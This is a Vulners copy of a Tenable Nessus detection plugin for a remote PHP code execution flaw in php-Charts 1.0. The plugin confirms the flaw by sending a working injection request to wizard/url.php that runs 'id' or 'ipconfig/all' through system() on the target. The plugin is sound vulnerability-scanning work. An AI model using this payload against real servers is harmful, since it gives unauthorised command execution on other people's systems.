Vulners
Lucene search
php-Charts url.php Remote PHP Code Execution
| Source | Link |
|---|---|
| nessus | www.nessus.org/u |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(64557);
script_version("1.13");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/11/22");
script_bugtraq_id(57448);
script_xref(name:"EDB-ID", value:"24201");
script_name(english:"php-Charts url.php Remote PHP Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary PHP
code execution.");
script_set_attribute(attribute:"description", value:
"The php-Charts install hosted on the remote web server contains a flaw
that could allow arbitrary PHP code execution. Input passed to the
'wizard/url.php' script is not properly sanitized before being used in a
PHP eval() call. An unauthenticated, remote attacker could leverage
this vulnerability to execute arbitrary PHP code on the remote host.");
# https://packetstormsecurity.com/files/119582/PHP-Chart-1.0-Code-Execution.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6e66577d");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'PHP-Charts v1.0 PHP Code Execution Vulnerability');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"x-cpe:/a:php_charts:php_charts");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("php_charts_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/php-charts");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(appname:'php-charts', port:port, exit_on_fail:TRUE);
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ('Windows' >< os)
cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
else
cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
else
{
cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
foreach cmd (keys(cmds))
{
output = "";
url = install['dir']+"/wizard/url.php?${system('"+cmd+"')}=1";
res = http_send_recv3(
method : "GET",
item : url,
port : port,
exit_on_fail:TRUE
);
body = res[2];
if (!egrep(string:body, pattern:cmds[cmd])) continue;
output = body;
# Remove any leading PHP errors or HTML
if ("ipconfig" >< cmd)
output_starter = "Windows IP Config";
else
output_starter = "uid=";
output = substr(output, stridx(output, output_starter));
# Remove any trailing PHP errors or HTML
if ("<" >< output)
{
html_start = stridx(output, "<");
output = substr(output, 0, html_start - 1);
}
# Trim output if overly lengthy
output = beginning_of_response(resp:output, max_lines:20);
break;
}
if (output)
{
if (report_verbosity > 0)
{
# Add request
report =
'\nNessus executed "' + cmd + '" by sending the following request :\n\n' +
crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
chomp(http_last_sent_request()) + '\n' +
crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n';
# Add command output
if (report_verbosity > 1)
report += '\nWhich resulted in the following command output :\n\n' + data_protection::sanitize_uid(output:output);
security_hole(port:port, extra:report);
}
else security_hole(port);
}
else
{
base_url = build_url(qs:install['dir']+'/', port:port);
audit(AUDIT_WEB_APP_NOT_AFFECTED, "php-Charts", base_url);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Nov 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4